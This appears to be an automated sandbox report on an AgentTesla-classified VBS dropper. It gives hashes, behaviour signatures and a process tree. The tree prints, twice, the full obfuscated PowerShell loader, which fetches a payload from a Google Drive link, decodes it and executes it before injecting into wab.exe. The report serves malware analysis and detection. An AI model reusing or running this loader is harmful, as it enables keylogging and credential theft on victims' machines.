Overview

overview

10

Static

static

1

Flab 42380...-9.vbs

windows7-x64

10

Flab 42380...-9.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    144s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-05-2024 18:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Flab 423800-213-KFO-872-1-9.vbs

  • Size

    5KB

  • MD5

    4f71bc91cc015856a2a5029d880f02f0

  • SHA1

    3f9e609f67057c573a15f469e4bb5e64c571174c

  • SHA256

    836259b5e47a4d9f6fdd2955e69645b8aa70bca6d139b0eb99038641db38dbe6

  • SHA512

    30de245e61fd2cf7462a9e4949a04acfd17da6ffd074886d440b11f76bc4c28b336a9a5ced2785695fa8049348cc152d35b43ab487ff193e6f001a3d23243c38

  • SSDEEP

    96:Q7ZrI+0JYJMAAiOL1vOZypNWiu/hlbz9cZh+xFUMLCT0MTUmdrQfp:Q150+GAAlOZypNWiu/hlPahKLCQMUhfp

Score
10/10
agentteslakeyloggerpersistencespywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Flab 423800-213-KFO-872-1-9.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2368
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Semistarved = 1;$Fortrnges='Sub';$Fortrnges+='strin';$Fortrnges+='g';Function Bogievognenes83($Bldgringsmidler89){$Lovgav=$Bldgringsmidler89.Length-$Semistarved;For($Twentythree=1;$Twentythree -lt $Lovgav;$Twentythree+=2){$Irrigably+=$Bldgringsmidler89.$Fortrnges.Invoke( $Twentythree, $Semistarved);}$Irrigably;}function Kalkbrnderens($Chokprisers){.($Posedes) ($Chokprisers);}$Vgavis=Bogievognenes83 '.M,oIz i lElUaB/,5 . 0p ( W iin dKo.wSsT ,NhT, I1S0W. 0 ;E SW iHnI6.4p;A Ex 6P4,;D ,rFvE: 1,2U1,. 0O)D .GCe.c,k oV/D2 0S1 0N0V1R0m1L .F,iEr.e fgoPx,/H1r2,1 .v0B ';$Discrowning136=Bogievognenes83 'OU sGe r.-LASgSe,n tL ';$oplagre=Bogievognenes83 'BhGtUt.pSs :C/k/IdPrHiSv eL.Pg odoTgSl ev. c oMm./FuGcB?aeBx.p.o.rWtP=Sd,o wTnEl,oSa d.& i d,= 1R0GUGUce.zNT,z p HBZKcFo.M.wNW asrB5OfULOvRh.K jRmtqUrF0S1 mAbSfT ';$Flitwite=Bogievognenes83 'M>L ';$Posedes=Bogievognenes83 'TiSeAx ';$Bothriums='Eksemplarers';$Spatheful26 = Bogievognenes83 'De,cSh,oS % aDpSp,dFaAt.a %B\ RLuAhCa,a,rJe d e .STAa.lP &,&c IeScOh.oD tL ';Kalkbrnderens (Bogievognenes83 ' $,g l.o bEa l :UF o cBu.sFePsS= (,c mSd ./ cR $CSFp.aTt.hCe f,uPlO2D6,). ');Kalkbrnderens (Bogievognenes83 'B$ g lSo b aMl,: K a rMlGetk aSm rKe tF=P$Uo.pIl aHgIrPe,. s.p,l i t (,$IFVlGiDt w,iDt,eB) ');$oplagre=$Karlekamret[0];$Topvinklers= (Bogievognenes83 'F$TgBlIo bTaDlS:,S.oMlOoTeIr s,=ENPeBw,-AO b j,e,c t CSWyEsTt eLm .TNFe.t . WLe b C lci eUn,t');$Topvinklers+=$Focuses[1];Kalkbrnderens ($Topvinklers);Kalkbrnderens (Bogievognenes83 ' $ SWoBlGote rTsK.RH.e a dUeOr s [U$SDDi sFc rRoOw.ndiTnSg,1.3 6I].=S$BVPgEaBvIi.s ');$Rejen=Bogievognenes83 'T$DS,o lFo eNrSsp. DSoDwAn l oMaBd F.iGlOe.(N$Lo psl,aVg r,eS,D$DMOe gBa,lso,m.aMnbi cE) ';$Megalomanic=$Focuses[0];Kalkbrnderens (Bogievognenes83 ',$Pg lHo.bPaWlS:UWOhTiPsIkAiEnT=P(BTIe,sFtS- PHa t h .$ MSeAgEa,l o mPa n iMc,), ');while (!$Whiskin) {Kalkbrnderens (Bogievognenes83 ',$FgQl,oIbSa l :EFBo.rKt.u.n,aCtBe.lHy =S$,tVr,uSe ') ;Kalkbrnderens $Rejen;Kalkbrnderens (Bogievognenes83 ' S tAaBrOtA- S.l,e.eOpB 4 ');Kalkbrnderens (Bogievognenes83 'I$.g l,oSbNa.l,:VWKheiBs.k i nM= ( Tte sIt - PKaPt h, B$ M,eMgDaBlRoDmuaPn isc.), ') ;Kalkbrnderens (Bogievognenes83 'H$ gLlKoSb,aSlB: BBeSn vBa r m eSr ndeusN=P$bg,lAoLbra,l,: tFeSl eGf oPtGoPe t +D+,%.$ K aSr lSeHk aKmOrTeFt .Vc o uUn t, ') ;$oplagre=$Karlekamret[$Benvarmernes];}$Taximeters=346626;$resummon=26683;Kalkbrnderens (Bogievognenes83 'N$ gSl o b aPlD:PCPoMnWdPoUtSt iSe rBi. =G ,GSe.tV-CCCoCnmt e n.t, .$ MFe.gSaBl,oUmHa.n,isc ');Kalkbrnderens (Bogievognenes83 ' $Sg l.oAb a,l :NSStUrCaNnUg lBe,mfeAn tU R=C [AS,y s.tSe mD.HCgo nIvCe r t,]E: : FUrSo.mABFa s eS6 4PSBtSrLi n,gA(S$FC oTnLdSo t tMiKe.rAi,). ');Kalkbrnderens (Bogievognenes83 ' $SgDlLo b aRl : C hAa.m.b,e r e d, =F H[ESby s.t.eRm .TT eFx tC. E.n c,oUd i nBg,]T:O:HA,S CMITIT.,GFeMtKS t rri n.gX(.$FS tSrFaDn gHl e mAe,n tI) ');Kalkbrnderens (Bogievognenes83 'B$.g,l.o.bra lO:,VNaRlFu,t aMkJuLr sOe rS=.$.C h a mAb e,r eCd .Ls u,bHsStrrFiSnMgU(.$.T.aBxSi mMe,t eMr sB, $ r e s u,m,mPoKn ), ');Kalkbrnderens $Valutakurser;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3924
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ruhaarede.Tal && echo t"
        3⤵
          PID:1560
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Semistarved = 1;$Fortrnges='Sub';$Fortrnges+='strin';$Fortrnges+='g';Function Bogievognenes83($Bldgringsmidler89){$Lovgav=$Bldgringsmidler89.Length-$Semistarved;For($Twentythree=1;$Twentythree -lt $Lovgav;$Twentythree+=2){$Irrigably+=$Bldgringsmidler89.$Fortrnges.Invoke( $Twentythree, $Semistarved);}$Irrigably;}function Kalkbrnderens($Chokprisers){.($Posedes) ($Chokprisers);}$Vgavis=Bogievognenes83 '.M,oIz i lElUaB/,5 . 0p ( W iin dKo.wSsT ,NhT, I1S0W. 0 ;E SW iHnI6.4p;A Ex 6P4,;D ,rFvE: 1,2U1,. 0O)D .GCe.c,k oV/D2 0S1 0N0V1R0m1L .F,iEr.e fgoPx,/H1r2,1 .v0B ';$Discrowning136=Bogievognenes83 'OU sGe r.-LASgSe,n tL ';$oplagre=Bogievognenes83 'BhGtUt.pSs :C/k/IdPrHiSv eL.Pg odoTgSl ev. c oMm./FuGcB?aeBx.p.o.rWtP=Sd,o wTnEl,oSa d.& i d,= 1R0GUGUce.zNT,z p HBZKcFo.M.wNW asrB5OfULOvRh.K jRmtqUrF0S1 mAbSfT ';$Flitwite=Bogievognenes83 'M>L ';$Posedes=Bogievognenes83 'TiSeAx ';$Bothriums='Eksemplarers';$Spatheful26 = Bogievognenes83 'De,cSh,oS % aDpSp,dFaAt.a %B\ RLuAhCa,a,rJe d e .STAa.lP &,&c IeScOh.oD tL ';Kalkbrnderens (Bogievognenes83 ' $,g l.o bEa l :UF o cBu.sFePsS= (,c mSd ./ cR $CSFp.aTt.hCe f,uPlO2D6,). ');Kalkbrnderens (Bogievognenes83 'B$ g lSo b aMl,: K a rMlGetk aSm rKe tF=P$Uo.pIl aHgIrPe,. s.p,l i t (,$IFVlGiDt w,iDt,eB) ');$oplagre=$Karlekamret[0];$Topvinklers= (Bogievognenes83 'F$TgBlIo bTaDlS:,S.oMlOoTeIr s,=ENPeBw,-AO b j,e,c t CSWyEsTt eLm .TNFe.t . WLe b C lci eUn,t');$Topvinklers+=$Focuses[1];Kalkbrnderens ($Topvinklers);Kalkbrnderens (Bogievognenes83 ' $ SWoBlGote rTsK.RH.e a dUeOr s [U$SDDi sFc rRoOw.ndiTnSg,1.3 6I].=S$BVPgEaBvIi.s ');$Rejen=Bogievognenes83 'T$DS,o lFo eNrSsp. DSoDwAn l oMaBd F.iGlOe.(N$Lo psl,aVg r,eS,D$DMOe gBa,lso,m.aMnbi cE) ';$Megalomanic=$Focuses[0];Kalkbrnderens (Bogievognenes83 ',$Pg lHo.bPaWlS:UWOhTiPsIkAiEnT=P(BTIe,sFtS- PHa t h .$ MSeAgEa,l o mPa n iMc,), ');while (!$Whiskin) {Kalkbrnderens (Bogievognenes83 ',$FgQl,oIbSa l :EFBo.rKt.u.n,aCtBe.lHy =S$,tVr,uSe ') ;Kalkbrnderens $Rejen;Kalkbrnderens (Bogievognenes83 ' S tAaBrOtA- S.l,e.eOpB 4 ');Kalkbrnderens (Bogievognenes83 'I$.g l,oSbNa.l,:VWKheiBs.k i nM= ( Tte sIt - PKaPt h, B$ M,eMgDaBlRoDmuaPn isc.), ') ;Kalkbrnderens (Bogievognenes83 'H$ gLlKoSb,aSlB: BBeSn vBa r m eSr ndeusN=P$bg,lAoLbra,l,: tFeSl eGf oPtGoPe t +D+,%.$ K aSr lSeHk aKmOrTeFt .Vc o uUn t, ') ;$oplagre=$Karlekamret[$Benvarmernes];}$Taximeters=346626;$resummon=26683;Kalkbrnderens (Bogievognenes83 'N$ gSl o b aPlD:PCPoMnWdPoUtSt iSe rBi. =G ,GSe.tV-CCCoCnmt e n.t, .$ MFe.gSaBl,oUmHa.n,isc ');Kalkbrnderens (Bogievognenes83 ' $Sg l.oAb a,l :NSStUrCaNnUg lBe,mfeAn tU R=C [AS,y s.tSe mD.HCgo nIvCe r t,]E: : FUrSo.mABFa s eS6 4PSBtSrLi n,gA(S$FC oTnLdSo t tMiKe.rAi,). ');Kalkbrnderens (Bogievognenes83 ' $SgDlLo b aRl : C hAa.m.b,e r e d, =F H[ESby s.t.eRm .TT eFx tC. E.n c,oUd i nBg,]T:O:HA,S CMITIT.,GFeMtKS t rri n.gX(.$FS tSrFaDn gHl e mAe,n tI) ');Kalkbrnderens (Bogievognenes83 'B$.g,l.o.bra lO:,VNaRlFu,t aMkJuLr sOe rS=.$.C h a mAb e,r eCd .Ls u,bHsStrrFiSnMgU(.$.T.aBxSi mMe,t eMr sB, $ r e s u,m,mPoKn ), ');Kalkbrnderens $Valutakurser;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5080
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ruhaarede.Tal && echo t"
            4⤵
              PID:1824
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Adds Run key to start application
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4468

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rq42olum.2iu.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Ruhaarede.Tal
        Filesize

        486KB

        MD5

        1bfa03c6f53315482c87ac075d5e4898

        SHA1

        e2252b3662c2989cef2233e1d5fa7554bf8e5bd8

        SHA256

        806ff71ceaf81fe7073d40617e7ccb34e4e9430fcccb5469c88e195e3c68eaf2

        SHA512

        47e7a36d739e740f0b2d89694c1c670315b9efc29c4a710ddfab5f6aa2cdcbaaad605eec17ef33e3b53c2023a112eb2de09c3be6c2f6e59df404d337e68255a8

        Download Submit

      • memory/3924-58-0x00007FFA84E20000-0x00007FFA858E1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3924-11-0x00007FFA84E20000-0x00007FFA858E1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3924-12-0x00007FFA84E20000-0x00007FFA858E1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3924-0-0x00007FFA84E23000-0x00007FFA84E25000-memory.dmp

        Filesize

        8KB

        Download

      • memory/3924-10-0x00000207243C0000-0x00000207243E2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/3924-40-0x00007FFA84E23000-0x00007FFA84E25000-memory.dmp

        Filesize

        8KB

        Download

      • memory/3924-39-0x00007FFA84E20000-0x00007FFA858E1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4468-62-0x00000000234E0000-0x00000000234EA000-memory.dmp

        Filesize

        40KB

        Download

      • memory/4468-61-0x00000000235E0000-0x0000000023672000-memory.dmp

        Filesize

        584KB

        Download

      • memory/4468-60-0x00000000234F0000-0x0000000023540000-memory.dmp

        Filesize

        320KB

        Download

      • memory/4468-55-0x0000000001000000-0x0000000001042000-memory.dmp

        Filesize

        264KB

        Download

      • memory/4468-54-0x0000000001000000-0x0000000002254000-memory.dmp

        Filesize

        18.3MB

        Download

      • memory/5080-17-0x0000000006160000-0x0000000006182000-memory.dmp

        Filesize

        136KB

        Download

      • memory/5080-34-0x0000000007C80000-0x0000000007D16000-memory.dmp

        Filesize

        600KB

        Download

      • memory/5080-35-0x0000000007C10000-0x0000000007C32000-memory.dmp

        Filesize

        136KB

        Download

      • memory/5080-36-0x0000000008E50000-0x00000000093F4000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/5080-33-0x0000000006F70000-0x0000000006F8A000-memory.dmp

        Filesize

        104KB

        Download

      • memory/5080-38-0x0000000009400000-0x000000000C491000-memory.dmp

        Filesize

        48.6MB

        Download

      • memory/5080-32-0x0000000008220000-0x000000000889A000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/5080-31-0x0000000006A00000-0x0000000006A4C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/5080-30-0x00000000069E0000-0x00000000069FE000-memory.dmp

        Filesize

        120KB

        Download

      • memory/5080-29-0x0000000006410000-0x0000000006764000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/5080-18-0x0000000006200000-0x0000000006266000-memory.dmp

        Filesize

        408KB

        Download

      • memory/5080-19-0x00000000063A0000-0x0000000006406000-memory.dmp

        Filesize

        408KB

        Download

      • memory/5080-16-0x0000000005AE0000-0x0000000006108000-memory.dmp

        Filesize

        6.2MB

        Download

      • memory/5080-15-0x0000000003120000-0x0000000003156000-memory.dmp

        Filesize

        216KB

        Download